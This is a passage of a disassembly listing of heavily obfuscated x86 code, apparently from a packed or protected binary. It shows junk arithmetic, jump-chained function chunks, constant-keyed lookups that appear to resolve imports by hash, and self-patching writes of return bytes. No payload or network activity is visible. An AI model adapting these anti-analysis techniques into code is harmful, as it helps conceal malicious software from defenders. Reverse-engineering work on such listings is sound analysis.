loc_4448F6:				; CODE XREF: sub_446718-4D6Dj
		add	ebx, 3A41D065h
		rol	ebx, 11h
		sub	ebx, 0A725B7E1h
		add	ebx, 0A244832Fh
		mov	[ebx], eax
		jmp	loc_440CCC
; END OF FUNCTION CHUNK	FOR sub_446718
; ---------------------------------------------------------------------------
		mov	ds:dword_41E19C, eax
		lea	eax, nullsub_433
		push	offset sub_43ED7E
		jmp	locret_44C292
; ---------------------------------------------------------------------------

loc_444928:				; CODE XREF: y2kk37jd:00457114j
					; y2kk37jd:loc_4584B5j
		mov	eax, [esp]
		push	ecx
		push	0B46AF1AFh
		pop	ecx
		sub	ecx, 0D97EB12Fh
		jmp	loc_4462CC
; ---------------------------------------------------------------------------

loc_44493D:				; CODE XREF: y2kk37jd:00457079j
		adc	edi, edx

; =============== S U B	R O U T	I N E =======================================



sub_44493F	proc near		; CODE XREF: sub_454539-9E8Ep

; FUNCTION CHUNK AT 0043C94C SIZE 00000007 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	edx, 0C90D1845h
		call	sub_440CD1
		push	eax
		ror	eax, 1Ch
		call	sub_43DBDD

loc_444956:				; CODE XREF: y2kk37jd:0044AFF1j
		jmp	loc_43C94C
sub_44493F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A783

loc_44495B:				; CODE XREF: sub_45A783-1371Aj
		jmp	loc_443751
; END OF FUNCTION CHUNK	FOR sub_45A783
; ---------------------------------------------------------------------------

loc_444960:				; CODE XREF: y2kk37jd:loc_44A05Dj
		add	esi, 0E043F297h
		xchg	esi, [esp]
		jmp	sub_43B276
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F811

loc_44496E:				; CODE XREF: sub_43F811:loc_4465B2j
		xchg	edi, [esp+4+var_4]
		jmp	sub_445BB5
; END OF FUNCTION CHUNK	FOR sub_43F811
; ---------------------------------------------------------------------------
		mov	eax, 24DE0EA8h
		call	sub_442C3E
		push	offset sub_44D41B
		jmp	loc_449421
; ---------------------------------------------------------------------------

loc_44498A:				; DATA XREF: sub_4408B9+185EAo
		push	94CC0E8Ch
		pop	edx
		rol	edx, 15h

loc_444993:				; CODE XREF: y2kk37jd:loc_441162j
		push	offset sub_444FD1
		jmp	loc_4522CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44499D:				; CODE XREF: sub_4448E2+8443j
		jnz	loc_45BF35
		jmp	loc_44EF17
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------

loc_4449A8:				; CODE XREF: y2kk37jd:0045AED5j
		xor	ecx, 0EAE99A11h
		ror	eax, 0Ch
; START	OF FUNCTION CHUNK FOR sub_444D6F

loc_4449B1:				; CODE XREF: sub_444D6F:loc_45AEC2j
		push	offset loc_4479D3
		jmp	nullsub_356
; END OF FUNCTION CHUNK	FOR sub_444D6F

; =============== S U B	R O U T	I N E =======================================



sub_4449BB	proc near		; DATA XREF: sub_44EDF8-50EDo

; FUNCTION CHUNK AT 0043E316 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456B55 SIZE 0000001F BYTES

		xchg	eax, [esp+0]
		call	sub_45AAD1
		push	55923A4Ah
		pop	eax
		or	eax, 81768DE2h
		jmp	loc_43E316
sub_4449BB	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_4449D4:				; CODE XREF: sub_43C851:loc_45AA31j
		jz	loc_44092E
		cmp	ebp, 9C61291Bh
		jmp	loc_4582C8
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_4449E5:				; CODE XREF: sub_453867:loc_44E140j
		add	eax, [ebp-4]
		xor	edx, edx
		jmp	loc_442C76
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446861

loc_4449EF:				; CODE XREF: sub_446861-B448j
		add	eax, [esp+4+var_4]
		adc	edx, [esp+4]
		add	esp, 8
		jmp	loc_456AC0
; END OF FUNCTION CHUNK	FOR sub_446861
; ---------------------------------------------------------------------------

loc_4449FE:				; CODE XREF: y2kk37jd:loc_447845j
		add	ebx, 0AA7F909Dh
		js	loc_44EB45
		jmp	loc_43CBBC
; ---------------------------------------------------------------------------
		push	offset loc_44ED66
		jmp	locret_455A4D
; ---------------------------------------------------------------------------
		popf
		jmp	sub_43BF88
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EAA8

loc_444A1F:				; CODE XREF: sub_43EAA8+F470j
		sub	esi, 13C49063h
		cdq
		jmp	loc_43B74E
; END OF FUNCTION CHUNK	FOR sub_43EAA8

; =============== S U B	R O U T	I N E =======================================



sub_444A2B	proc near		; CODE XREF: y2kk37jd:00443C13j
					; sub_445226+CE5Fp

; FUNCTION CHUNK AT 0043F403 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043FBA4 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044F7AB SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00457508 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045B376 SIZE 0000001A BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	eax, [eax-18h]
		and	eax, 7
		mov	[ebp-0Ch], eax
		cmp	dword ptr [ebp-10h], 0
		jnz	loc_44F7BC
		jmp	loc_44F7AB
sub_444A2B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		adc	edi, 0A22C5B8Ah
		jmp	sub_448770
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_444A52:				; CODE XREF: sub_43EF4F:loc_43EB17j
		mov	eax, [esp+0]
		call	sub_4526B7
		retn
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; ---------------------------------------------------------------------------
		db 0F4h
dword_444A5C	dd 0			; DATA XREF: sub_453867:loc_43E2F8r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B0B

loc_444A60:				; CODE XREF: sub_453B0B-EE97j
		jmp	loc_43FE71
; END OF FUNCTION CHUNK	FOR sub_453B0B

; =============== S U B	R O U T	I N E =======================================



sub_444A65	proc near		; CODE XREF: sub_407CFA+1Dp
					; sub_407D3A+25p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044660C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BBD6 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044F685 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004574AD SIZE 00000005 BYTES

		push	ecx
		push	5D8B6342h
		jmp	loc_44BBD6
sub_444A65	endp

; ---------------------------------------------------------------------------
		jge	loc_45A2E9
		jmp	sub_4591AE
; ---------------------------------------------------------------------------
		mov	eax, 5A4FBBBh
		push	eax
		push	8A932D6Ch
		pop	eax
		jmp	loc_45506D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_444A8C:				; CODE XREF: sub_43F346:loc_44CE27j
					; sub_43F346+15E47j
		mov	eax, 0CF0182F6h
		call	sub_442C3E
		xor	eax, 4DCF7224h
		sub	eax, 0FA73D789h
		jmp	loc_441833
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
		popf
		jmp	sub_44D5A6
; ---------------------------------------------------------------------------
		sub	edx, 4980D054h
		jmp	loc_44417A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440337

loc_444AB8:				; CODE XREF: sub_440337+30DEj
		or	ebx, ds:4000E9h
		rol	ebx, 8
		add	ebx, 93817D3h
		xchg	ebx, [esp+0]
		jmp	sub_440CD1
; END OF FUNCTION CHUNK	FOR sub_440337
; ---------------------------------------------------------------------------
		db 38h
dword_444AD0	dd 0CBC77D45h		; DATA XREF: sub_44493F:loc_43C94Cw
					; sub_44AFF6-2780r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F9C

loc_444AD4:				; CODE XREF: y2kk37jd:0044F99Bj
					; sub_442F9C+182F0j
		jmp	loc_43F124
; END OF FUNCTION CHUNK	FOR sub_442F9C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457239

loc_444AD9:				; CODE XREF: sub_457239-17DF3j
		jmp	nullsub_203
; END OF FUNCTION CHUNK	FOR sub_457239
; ---------------------------------------------------------------------------
		dw 310Eh
dword_444AE0	dd 6C94h		; DATA XREF: sub_43D8B6r
					; sub_4441FF+EE5Dw ...
; ---------------------------------------------------------------------------

loc_444AE4:				; CODE XREF: y2kk37jd:00459138j
		jmp	loc_450D1E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452251

loc_444AE9:				; CODE XREF: sub_452251+7j
		jmp	sub_44F3F5
; END OF FUNCTION CHUNK	FOR sub_452251
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44255B

loc_444AEE:				; CODE XREF: sub_44255B+EF3Bj
		jmp	loc_44533E
; END OF FUNCTION CHUNK	FOR sub_44255B
; ---------------------------------------------------------------------------
		db 57h
dword_444AF4	dd 0A34EFCEEh		; DATA XREF: sub_44EE3D:loc_43BFD1r
					; sub_4518C3-4F0Dr ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_444AF8:				; CODE XREF: sub_4507BF+B96Fj
		jmp	nullsub_429
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
		db 67h,	2Ah, 0E1h
		dd 7F7E5437h, 4155E9h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E1E9

loc_444B09:				; CODE XREF: sub_43E1E9+326Cj
		jmp	loc_4412B4
; END OF FUNCTION CHUNK	FOR sub_43E1E9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_484. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453093

loc_444B0F:				; CODE XREF: sub_453093:loc_443CCFj
		jl	loc_453145
		jge	loc_44E04A
		or	edi, 0A7786E8Dh
		shr	esi, 1Dh
		jmp	loc_453142
; END OF FUNCTION CHUNK	FOR sub_453093
; ---------------------------------------------------------------------------

loc_444B29:				; CODE XREF: y2kk37jd:00451238j
		xor	edx, 0AD2F1125h
		test	edx, 800000h
		jmp	loc_43F0E4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4444CA

loc_444B3A:				; CODE XREF: sub_4444CA-4C23j
		push	edi
		mov	edi, ecx
		xchg	edi, [esp-4+arg_0]
		mov	ecx, edx
		xchg	ecx, [esp-4+arg_0]
		jmp	loc_443825
; END OF FUNCTION CHUNK	FOR sub_4444CA
; ---------------------------------------------------------------------------
		jle	loc_454CAE
		jmp	loc_440FDD
; ---------------------------------------------------------------------------

loc_444B55:				; CODE XREF: y2kk37jd:0045AC88j
		test	ecx, 37135F64h
		jmp	loc_44F92A
; ---------------------------------------------------------------------------

loc_444B60:				; CODE XREF: y2kk37jd:0045C0F9j
		or	ecx, 9837C2Ch
		add	ecx, 34BC0196h
		xchg	ecx, [esp]
		jmp	sub_440337
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452B42

loc_444B74:				; CODE XREF: sub_452B42:loc_448EF7j
					; sub_452B42-9C3Cj
		or	ecx, 0DF48E624h
		add	ecx, 0C7F010h
		push	offset loc_441280
		jmp	nullsub_230
; END OF FUNCTION CHUNK	FOR sub_452B42
; ---------------------------------------------------------------------------

loc_444B8A:				; CODE XREF: y2kk37jd:0044EDC5j
		jnb	nullsub_206
		not	ebp
		jmp	loc_450B6E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44931C

loc_444B97:				; CODE XREF: sub_44931C:loc_43C507j
		push	ecx
		jmp	loc_454ED3
; END OF FUNCTION CHUNK	FOR sub_44931C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_444B9D:				; CODE XREF: sub_43F346:loc_450880j
		mov	al, [eax]
		jnb	loc_449FF2
		sub	al, 99h
		push	34D366A0h
		xchg	ebx, [esp+0]
		jmp	loc_458142
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------

loc_444BB4:				; CODE XREF: y2kk37jd:0044ED97j
		ror	ecx, 1Dh

; =============== S U B	R O U T	I N E =======================================



sub_444BB7	proc near		; CODE XREF: sub_448C53+1p

; FUNCTION CHUNK AT 0044748D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004540D0 SIZE 00000022 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	0CBFE12BBh
		pop	edx
		add	edx, 0D7A5CD6Eh
		jmp	loc_44748D
sub_444BB7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_444BCC:				; CODE XREF: sub_453867-16292j
		jbe	loc_44B9C6
		xor	ebp, esi
		popf
		jmp	loc_43DF5B
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_444BDA:				; CODE XREF: sub_443BAF:loc_45040Fj
		cmp	ebx, 86571A0Eh
		jmp	loc_452ACF
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------
		mov	eax, 19CFC62Bh
		call	sub_442C3E
		mov	ds:dword_41E060, eax
		lea	eax, nullsub_502
		mov	byte ptr [eax],	0C3h
		jmp	loc_454163
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C03C

loc_444C03:				; CODE XREF: sub_45C03C:loc_44D18Fj
		pop	ecx
		and	ecx, 0EBEF1D8Bh
		xor	ecx, 37D26E56h
		add	ecx, 0BADE7F1Eh
		jmp	loc_4430D8
; END OF FUNCTION CHUNK	FOR sub_45C03C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_444C1B:				; CODE XREF: sub_445226+121E5j
		jns	loc_458941

loc_444C21:				; CODE XREF: sub_44723A:loc_4599C4j
					; sub_43D6A6+1F042j
		jmp	loc_451CAE
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_444C26:				; CODE XREF: y2kk37jd:00441CB8j
		jmp	loc_440CF1
; ---------------------------------------------------------------------------
		cmp	ebx, 6C7EF476h
		jmp	loc_45AE6B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468E0

loc_444C36:				; CODE XREF: sub_4468E0:loc_45A561j
		call	sub_446819
		mov	eax, 276E7523h
		call	sub_442C3E
		mov	ds:off_41E174, eax
		lea	eax, sub_4468E0
		jmp	loc_453667
; END OF FUNCTION CHUNK	FOR sub_4468E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441222

loc_444C56:				; CODE XREF: sub_441222:loc_4593BCj
		mov	eax, [ebp-8]
		push	offset sub_450238
		jmp	loc_456563
; END OF FUNCTION CHUNK	FOR sub_441222
; ---------------------------------------------------------------------------
		xchg	ecx, [esi]
		jmp	sub_446FEB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B0B

loc_444C6A:				; CODE XREF: sub_453B0B-A5F0j
		push	edx

loc_444C6B:				; CODE XREF: sub_453B0B:loc_44950Bj
		add	edi, 0AF0DCB0Dh
		xchg	edi, [esp+0]
		jmp	loc_444A60
; END OF FUNCTION CHUNK	FOR sub_453B0B

; =============== S U B	R O U T	I N E =======================================



sub_444C79	proc near		; CODE XREF: sub_4411C3:loc_441672p
					; y2kk37jd:00452606j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0045A530 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	esi, offset byte_47EF71
		xchg	esi, [esp-4+arg_0]
		jmp	loc_45A530
sub_444C79	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44723A

loc_444C8B:				; CODE XREF: sub_44723A:loc_44D2CDj
		adc	esi, 819EEE2Ah
		jbe	loc_457659
		jmp	loc_45B322
; END OF FUNCTION CHUNK	FOR sub_44723A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_444C9C:				; CODE XREF: sub_4597AE-1D5DEj
		add	ecx, 9C164E0Eh
		xchg	ecx, [esp+8+var_8]
		jmp	sub_4553C1
; END OF FUNCTION CHUNK	FOR sub_4597AE
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		push	edx
		call	sub_455BE9
		push	offset sub_44626D
		jmp	locret_44F91A
; ---------------------------------------------------------------------------

loc_444CBE:				; CODE XREF: y2kk37jd:0045571Cj
		pop	edx
		mov	eax, [esp]
		push	edx
		call	sub_45ADEC
		mov	eax, 2D912001h
		call	sub_442C3E
		mov	ds:dword_41E14C, eax
		lea	eax, nullsub_481
		jmp	loc_449722
; ---------------------------------------------------------------------------
		mov	ds:off_41E140, eax
		lea	eax, sub_44B86B
		mov	byte ptr [eax],	0C3h
		jmp	sub_44B86B
; ---------------------------------------------------------------------------
		call	sub_44C5B8	; GetFileType
; START	OF FUNCTION CHUNK FOR sub_4450D1

loc_444CFC:				; CODE XREF: sub_4450D1-8E3Dj
		jmp	loc_457AD1
; END OF FUNCTION CHUNK	FOR sub_4450D1
; ---------------------------------------------------------------------------

loc_444D01:				; CODE XREF: y2kk37jd:loc_44E788j
		jnz	loc_43CF85
		jmp	loc_455A4E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466E0

loc_444D0C:				; CODE XREF: sub_4466E0+8248j
		pop	eax
		rol	eax, 3

loc_444D10:				; CODE XREF: sub_4466E0:loc_458B44j
		call	sub_45405E
		push	offset sub_44C1F2
		jmp	loc_44D742
; END OF FUNCTION CHUNK	FOR sub_4466E0
; ---------------------------------------------------------------------------

loc_444D1F:				; CODE XREF: y2kk37jd:loc_440887j
		push	0E83F4A2Ah
		pop	esi

loc_444D25:				; CODE XREF: y2kk37jd:loc_4587B4j
		rol	esi, 1
		sub	esi, 0FC969AC0h
		xor	esi, 1657F659h
		or	esi, 738D85B3h
		add	esi, 887323Dh
		mov	[esi], edx
		jmp	loc_452F84

; =============== S U B	R O U T	I N E =======================================



sub_444D46	proc near		; CODE XREF: y2kk37jd:00443D97p
					; y2kk37jd:00449F75j

arg_0		= dword	ptr  4

		xchg	ecx, [esp+0]
		pop	ecx
		or	eax, ecx
		sbb	eax, 0E1A21E32h
		xchg	ebx, [esp-4+arg_0]
		jmp	sub_44A3F8
sub_444D46	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_444D5A	proc near		; CODE XREF: sub_44931C-35A6p
					; y2kk37jd:00447A55j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0045189D SIZE 00000017 BYTES

		xchg	edi, [esp+0]
		pop	edi
		xor	edx, edx
		call	sub_43FEFB

loc_444D65:				; CODE XREF: sub_445DF5+5F06j
		jmp	loc_45189D
sub_444D5A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_444D6A:				; CODE XREF: y2kk37jd:0044E032j
		push	590C7C94h

; =============== S U B	R O U T	I N E =======================================



sub_444D6F	proc near		; CODE XREF: sub_441856+5037p

; FUNCTION CHUNK AT 004449B1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044AD91 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CCD8 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045AEAC SIZE 00000021 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	[ebp-0Ch], eax
		call	sub_43B0F5

loc_444D7B:				; CODE XREF: y2kk37jd:0044B77Ej
					; sub_454B84+23C6j
		jmp	loc_44CCD8
sub_444D6F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_444D80:				; CODE XREF: y2kk37jd:004487C3j
		jmp	loc_445FDB
; ---------------------------------------------------------------------------

loc_444D85:				; DATA XREF: sub_43F618+123BBo
		add	edi, ecx
		pop	ecx
		mov	[edi], eax
		pop	edi
		mov	eax, [ebp-4]
		mov	al, [eax]
		jb	loc_457BA9
		push	offset sub_43BF79
		jmp	loc_44182E
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_43E6EC
		jmp	loc_447E94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_444DAD:				; CODE XREF: sub_445226:loc_45B8D1j
		jnz	loc_43BA0C
		jmp	loc_44AB21
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_444DB8:				; CODE XREF: sub_4514DE:loc_44E7C9j
		jz	loc_446EC9
		jmp	loc_456C56
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
		ror	eax, 1Fh
		jmp	sub_43B1E6
; ---------------------------------------------------------------------------

loc_444DCB:				; CODE XREF: y2kk37jd:00445C73j
		add	edi, 1997134Bh
; START	OF FUNCTION CHUNK FOR sub_440A47

loc_444DD1:				; CODE XREF: sub_440A47:loc_445C64j
		add	ebx, 0E486366Ch
		xchg	ebx, [esp+8+var_8]
; END OF FUNCTION CHUNK	FOR sub_440A47
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_444DDA:				; CODE XREF: sub_4507BF-13E61j
		jmp	loc_4574B2
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
		call	loc_4454B7
; START	OF FUNCTION CHUNK FOR sub_4492F7

loc_444DE4:				; CODE XREF: sub_4492F7:loc_446A3Dj
		mov	eax, 6
		sub	eax, [ebp-4]
		mov	[ebp-4], eax
		jmp	loc_446D8F
; END OF FUNCTION CHUNK	FOR sub_4492F7

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_444DF4	proc near		; CODE XREF: sub_44B924-102D6p
					; sub_44B924-D6B5p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043BBEF SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00442568 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00454FC3 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00459E9B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C66F SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF8h
		mov	[ebp+var_4], eax

loc_444DFD:				; CODE XREF: sub_4436C1+EF9Fj
		jb	loc_43BC00
		jmp	loc_442568
sub_444DF4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BBF8

loc_444E08:				; CODE XREF: sub_45BBF8-16633j
		mov	edx, ecx
		pop	ecx
		mov	eax, [esp+0]
		push	edx
		push	offset loc_457F83
		jmp	loc_43D66C
; END OF FUNCTION CHUNK	FOR sub_45BBF8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454539

loc_444E19:				; CODE XREF: sub_454539+1j
					; y2kk37jd:loc_45B7A4j
		mov	eax, [esp+4+var_4]
		push	esi
		mov	esi, ebx
		xchg	esi, [esp+0]
		push	edx
		pop	ebx
		xchg	ebx, [esp+0]
		jmp	loc_44DA44
; END OF FUNCTION CHUNK	FOR sub_454539
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_359. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DE9F

loc_444E2D:				; CODE XREF: sub_44DE9F+7j
		jmp	loc_446F55
; END OF FUNCTION CHUNK	FOR sub_44DE9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_444E32:				; CODE XREF: sub_454C24-745Dj
		push	offset loc_43D11A
		jmp	nullsub_311
; END OF FUNCTION CHUNK	FOR sub_454C24
; ---------------------------------------------------------------------------

loc_444E3C:				; CODE XREF: y2kk37jd:00458268j
		test	eax, 0C7BDA190h
		jmp	loc_448CF6
; ---------------------------------------------------------------------------
		mov	ds:off_41E024, eax
		push	offset loc_44CC60
		jmp	locret_4485A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_444E57:				; CODE XREF: sub_445226:loc_442133j
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD78

loc_444E5B:				; CODE XREF: sub_43BD78:loc_43BD7Aj
		rol	eax, 18h
; END OF FUNCTION CHUNK	FOR sub_43BD78
; START	OF FUNCTION CHUNK FOR sub_457A46

loc_444E5E:				; CODE XREF: sub_457A46+2270j
		push	edx
		mov	edx, eax
		xchg	edx, [esp+4+var_4]
		jmp	loc_443069
; END OF FUNCTION CHUNK	FOR sub_457A46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_444E69:				; CODE XREF: sub_445226:loc_44A3DDj
		or	ebx, 69366833h
		add	ebx, 14CD97AFh
		xchg	ebx, [esp+4+var_4]
		jmp	sub_4526B7
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

locret_444E7D:				; CODE XREF: y2kk37jd:loc_44F656j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4492F7

loc_444E7E:				; CODE XREF: sub_4492F7+1Fj
		jmp	loc_446D8F
; END OF FUNCTION CHUNK	FOR sub_4492F7

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_444E83	proc near		; CODE XREF: sub_446183:loc_446189j

var_14		= byte ptr -14h

; FUNCTION CHUNK AT 0043EDE3 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0044590F SIZE 0000002C BYTES
; FUNCTION CHUNK AT 004459FB SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044DD0E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00450426 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045470F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045489C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00454E4C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A236 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		cmp	ds:dword_44D2B4, 0
		jnz	loc_44DD0E
		jmp	loc_45A236
sub_444E83	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_444E9B:				; CODE XREF: y2kk37jd:00451CD3j
		xor	eax, 0CB7FFBF0h
		add	eax, ebp
		add	eax, 36092D04h
		mov	eax, [eax]
		cmp	eax, ds:dword_44663C
		jz	loc_458FB4
		jmp	loc_43C43A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45157A

loc_444EBC:				; CODE XREF: sub_45157A-11C80j
		add	ebx, 0B5697AECh
		xchg	ebx, [esp+0]
		jmp	loc_450F5E
; END OF FUNCTION CHUNK	FOR sub_45157A
; ---------------------------------------------------------------------------
		shl	eax, 0Fh
		jmp	loc_45AABF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456136

loc_444ED2:				; CODE XREF: sub_456136:loc_44572Aj
		add	edi, ebp
		shl	edi, 0Fh
		jmp	loc_453272
; END OF FUNCTION CHUNK	FOR sub_456136
; ---------------------------------------------------------------------------

loc_444EDC:				; CODE XREF: y2kk37jd:0044A51Aj
		sub	esi, edi

; =============== S U B	R O U T	I N E =======================================



sub_444EDE	proc near		; CODE XREF: y2kk37jd:0045A376p

; FUNCTION CHUNK AT 0044BFCA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C5D8 SIZE 0000000B BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		call	sub_45024B
		pop	ecx
		jmp	loc_44BFCA
sub_444EDE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_444EED:				; CODE XREF: y2kk37jd:loc_450241j
		pop	ebp
		jns	loc_43B611
		mov	eax, [esp]
		push	edi
		mov	edi, ecx
		xchg	edi, [esp]
		jmp	loc_459462
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_444F03:				; CODE XREF: sub_4448E2+BA75j
		jmp	loc_44B1DD
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C2D

loc_444F08:				; CODE XREF: sub_455C2D+6j
		call	sub_44C01B
; END OF FUNCTION CHUNK	FOR sub_455C2D
; START	OF FUNCTION CHUNK FOR sub_44C2AE

loc_444F0D:				; CODE XREF: sub_44C2AE+1Aj
		jmp	loc_45639C
; END OF FUNCTION CHUNK	FOR sub_44C2AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441F5E

loc_444F12:				; CODE XREF: sub_441F5E:loc_444F57j
		pop	esi
		sub	edi, 9CA91D7Dh
		js	loc_43F698

loc_444F1F:				; CODE XREF: sub_45618C+1C6Aj
		jmp	nullsub_442
; END OF FUNCTION CHUNK	FOR sub_441F5E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E389

loc_444F24:				; CODE XREF: sub_43E389+AC9Dj
		jmp	sub_440337
; END OF FUNCTION CHUNK	FOR sub_43E389
; ---------------------------------------------------------------------------
		push	28246496h
		jmp	loc_45AAEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C79

loc_444F33:				; CODE XREF: sub_455C79:loc_43E34Cj
